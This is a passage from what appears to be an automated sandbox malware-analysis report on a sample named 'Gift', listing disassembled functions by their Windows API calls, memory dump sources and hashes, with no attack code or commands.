                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                          • String ID:
                                                                          • API String ID: 1413079979-0
                                                                          • Opcode ID: 99250c39683b8b74085202470a92cc96fb6388b21523ef1de89b7e873af57327
                                                                          • Instruction ID: 40d750099615e894a1bb18b96c0582974dcd6e3f84131f1ae7308c724a268560
                                                                          • Opcode Fuzzy Hash: 99250c39683b8b74085202470a92cc96fb6388b21523ef1de89b7e873af57327
                                                                          • Instruction Fuzzy Hash: 6E11477250120EEBDB028FA4ED49BDA7BADEF08704F058025FA04A2160C7B29D60EB60
                                                                          Function 0032C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0032C34E
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0032C35F
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0032C366
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0032C36E
                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0032C385
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0032C397
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: c0c35e4fd04caa4961a6b33b12124cd9ddf2394bde0d120a5d9ce15c0391ab22
                                                                          • Instruction ID: 4242bdefc8090e2474143bccf76010ac0fee0b15446fce3f8ee02a934090ec90
                                                                          • Opcode Fuzzy Hash: c0c35e4fd04caa4961a6b33b12124cd9ddf2394bde0d120a5d9ce15c0391ab22
                                                                          • Instruction Fuzzy Hash: 99014475E00219BBEF119BA59C4AA5FBFBCEB48751F008065FA04AB290D6B49D10CFA0
                                                                          Function 0035C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D1729
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1738
                                                                            • Part of subcall function 002D16CF: BeginPath.GDI32(?), ref: 002D174F
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1778
                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0035C57C
                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 0035C590
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035C59E
                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 0035C5AE
                                                                          • EndPath.GDI32(00000000), ref: 0035C5BE
                                                                          • StrokePath.GDI32(00000000), ref: 0035C5CE
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                          • String ID:
                                                                          • API String ID: 43455801-0
                                                                          • Opcode ID: 9496e3ffbda9f416e72a5db651b40ff96a0531caf33614113879b308de9139ab
                                                                          • Instruction ID: 60e97e2b3042a7883b75ea310b277af02d804068d3ece28f9c5aa575c538d166
                                                                          • Opcode Fuzzy Hash: 9496e3ffbda9f416e72a5db651b40ff96a0531caf33614113879b308de9139ab
                                                                          • Instruction Fuzzy Hash: FA11097600410CBFDB129F91DC89EAA7FADEB09354F048421FA195A1A0D7B2AE55DBA0
                                                                          Function 002F07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002F07EC
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 002F07F4
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002F07FF
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002F080A
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 002F0812
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F081A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: eba020aeb37a16ae4a4d909555f5f05f33beff303aa1328b8160f43585e31568
                                                                          • Instruction ID: 270260a9f773f68e3155bbd5872182e02b8f7c86eca372adcd9f17eb6f2c8695
                                                                          • Opcode Fuzzy Hash: eba020aeb37a16ae4a4d909555f5f05f33beff303aa1328b8160f43585e31568
                                                                          • Instruction Fuzzy Hash: 9D0148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847941C7F5A864CBE5
                                                                          Function 003359A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003359B4
                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003359CA
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 003359D9
                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003359E8
                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003359F2
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003359F9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 839392675-0
                                                                          • Opcode ID: 27c9ccfeda834d2e53cac3510ed07ee92619bff8fdb66376b101a4deabdf00bc
                                                                          • Instruction ID: d7f33707041e992f0d0c73068e0838a21cd46e11114d9a65fe7cd0d3f29821d2
                                                                          • Opcode Fuzzy Hash: 27c9ccfeda834d2e53cac3510ed07ee92619bff8fdb66376b101a4deabdf00bc
                                                                          • Instruction Fuzzy Hash: 5AF03A36241158BBE7265B92DC0EEEF7B7CEFCBB22F004159FA05D1050EBE01A1186B5
                                                                          Function 003377EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 003377FE
                                                                          • EnterCriticalSection.KERNEL32(?,?,002DC2B6,?,?), ref: 0033780F
                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,002DC2B6,?,?), ref: 0033781C
                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,002DC2B6,?,?), ref: 00337829
                                                                            • Part of subcall function 003371F0: CloseHandle.KERNEL32(00000000,?,00337836,?,002DC2B6,?,?), ref: 003371FA
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0033783C
                                                                          • LeaveCriticalSection.KERNEL32(?,?,002DC2B6,?,?), ref: 00337843
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: 3278be9d2efbc0f91aef05ff5a1b2fc553f16b32f84bc619854857c593305324
                                                                          • Instruction ID: fbe6cf8467d122e67c0a44aeab7ea55f85ad21181a05f80de6fe29ac02c10315
                                                                          • Opcode Fuzzy Hash: 3278be9d2efbc0f91aef05ff5a1b2fc553f16b32f84bc619854857c593305324
                                                                          • Instruction Fuzzy Hash: 12F0BE72044202ABD7272B64EC8EAEF373DFF05702F154821F102940A0CBF55811CB60
                                                                          Function 0032954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00329555
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00329561
                                                                          • CloseHandle.KERNEL32(?), ref: 0032956A
                                                                          • CloseHandle.KERNEL32(?), ref: 00329572
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0032957B
                                                                          • HeapFree.KERNEL32(00000000), ref: 00329582
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: 9112b8885bc395bb9361cc19a4f31f933e27dcf553faa434d6546e3204d52642
                                                                          • Instruction ID: bc44c52bd9cddb58d86bb54688ddeb53f102c0009c81227cbe3e100ab6a46721
                                                                          • Opcode Fuzzy Hash: 9112b8885bc395bb9361cc19a4f31f933e27dcf553faa434d6546e3204d52642
                                                                          • Instruction Fuzzy Hash: F5E0C23A004101BBDA071BE1EC0E95ABB2DFB4A722B108620F21581170CBB2A460DB50
                                                                          Function 00348CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00348CFD
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00348E0C
                                                                          • VariantClear.OLEAUT32(?), ref: 00348F84
                                                                            • Part of subcall function 00337B1D: VariantInit.OLEAUT32(00000000), ref: 00337B5D
                                                                            • Part of subcall function 00337B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00337B66
                                                                            • Part of subcall function 00337B1D: VariantClear.OLEAUT32(00000000), ref: 00337B72
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                          • API String ID: 4237274167-1221869570
                                                                          • Opcode ID: aba23f1cecda9b745166ab2a3d6a37943cff6bcff16c669cf5a55f31fd802870
                                                                          • Instruction ID: 7dad904dcdb035a7ee7957071b36dacefe072c942f16f04a20fdf37476debccf
                                                                          • Opcode Fuzzy Hash: aba23f1cecda9b745166ab2a3d6a37943cff6bcff16c669cf5a55f31fd802870
                                                                          • Instruction Fuzzy Hash: 4F918C706083419FC711EF24C48595EBBE9EF89354F14896EF89A8B3A2DB30ED45CB52
                                                                          Function 0033323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                          • _memset.LIBCMT ref: 0033332E
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0033335D
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00333410
                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0033343E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 4152858687-4108050209
                                                                          • Opcode ID: 07f94c0cf08f1a4150f9cc9368c2686c88768d53ce4691e76a664c7417eca054
                                                                          • Instruction ID: 098a3ae5e86f81b37147e1c78ac538dfa73468a7b077233e00765a8a43caf830
                                                                          • Opcode Fuzzy Hash: 07f94c0cf08f1a4150f9cc9368c2686c88768d53ce4691e76a664c7417eca054
                                                                          • Instruction Fuzzy Hash: A951DE316183019BD717AF29C885A6BBBE8AF45360F058A2EF895D31E1DB70CE54CB52
                                                                          Function 00332EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00332F67
                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00332F83
                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00332FC9
                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00397890,00000000), ref: 00333012
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1173514356-4108050209
                                                                          • Opcode ID: d22873547beae6a938ac7bc9b6fae98beca314efb20e5b35e00c7dd36bb33c20
                                                                          • Instruction ID: 9eb212c82df5bc4bb82b44b73bd7942cd4d5021bebab7bd76b582c80f6be37e9
                                                                          • Opcode Fuzzy Hash: d22873547beae6a938ac7bc9b6fae98beca314efb20e5b35e00c7dd36bb33c20
                                                                          • Instruction Fuzzy Hash: 8B41B4312043419FD725DF24C885B5BBBE8BF85320F11862EF5A69B291D770E905CB52
                                                                          Function 00329A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00329ACC
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00329ADF
                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00329B0F
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 365058703-1403004172
                                                                          • Opcode ID: bfb61cff4cd769c8311c54ef77ec6ac41f6d2728dc417f4452b8b0a5b02b9bd9
                                                                          • Instruction ID: b426f0a35fe17ec9904643bad5976bf4870c4de57b770c8a0a24e083bba2a38e
                                                                          • Opcode Fuzzy Hash: bfb61cff4cd769c8311c54ef77ec6ac41f6d2728dc417f4452b8b0a5b02b9bd9
                                                                          • Instruction Fuzzy Hash: 74213571941104BEDB1AEBA4EC86DFFB77CDF45360F50412AF825972E1DB740D658A20
                                                                          Function 00356A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                            • Part of subcall function 002D2111: GetStockObject.GDI32(00000011), ref: 002D2163
                                                                            • Part of subcall function 002D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00356A86
                                                                          • LoadLibraryW.KERNEL32(?), ref: 00356A8D
                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00356AA2
                                                                          • DestroyWindow.USER32(?), ref: 00356AAA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 4146253029-1011021900
                                                                          • Opcode ID: adc0c5519fb8d4add386db9cf11adfc4453242306ef94dab8cf3775b398ec89d
                                                                          • Instruction ID: d82fa60f85bafea2cc404f308e09a12aee285b3b889770f592da8b812ec1329d
                                                                          • Opcode Fuzzy Hash: adc0c5519fb8d4add386db9cf11adfc4453242306ef94dab8cf3775b398ec89d
                                                                          • Instruction Fuzzy Hash: CA21CDB1210205AFEF228FA4DC82EBB37ACEB59325F918619FE11A31B0D371CC549760
                                                                          Function 00337357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00337377
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003373AA
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003373BC
                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003373F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: ff947f01003df0e7c49deb889da866a1ddcd1d5ece5d9adc86898234d8984ff0
                                                                          • Instruction ID: 6c478cd002c91f64c6aa5b1952cbe4f13c3fdda1729e2bc6e4f22a5349a51fe6
                                                                          • Opcode Fuzzy Hash: ff947f01003df0e7c49deb889da866a1ddcd1d5ece5d9adc86898234d8984ff0
                                                                          • Instruction Fuzzy Hash: 3521A7B450430AABDB329F65DC85A9E77E8AF45730F204A19FCA0D72D0D7B0D854DB90
                                                                          Function 00337425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00337444
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00337476
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00337487
                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003374C1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: 5d24e3ec4eb3031a9a90346d0410dcbf45d0224dad18f8e54e78a44e385116c1
                                                                          • Instruction ID: addfe85ea295a71048c71255a66fe067a3e33443411731cf13b7537ee4865d68
                                                                          • Opcode Fuzzy Hash: 5d24e3ec4eb3031a9a90346d0410dcbf45d0224dad18f8e54e78a44e385116c1
                                                                          • Instruction Fuzzy Hash: B821A4B150830A9BDB319F6A9C85A9A7BA8AF55730F204B19F9A0D72D0DB70E851CB50
                                                                          Function 0033B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0033B297
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0033B2EB
                                                                          • __swprintf.LIBCMT ref: 0033B304
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00360980), ref: 0033B342
                                                                          Strings
                                                                          Memory Dump Source
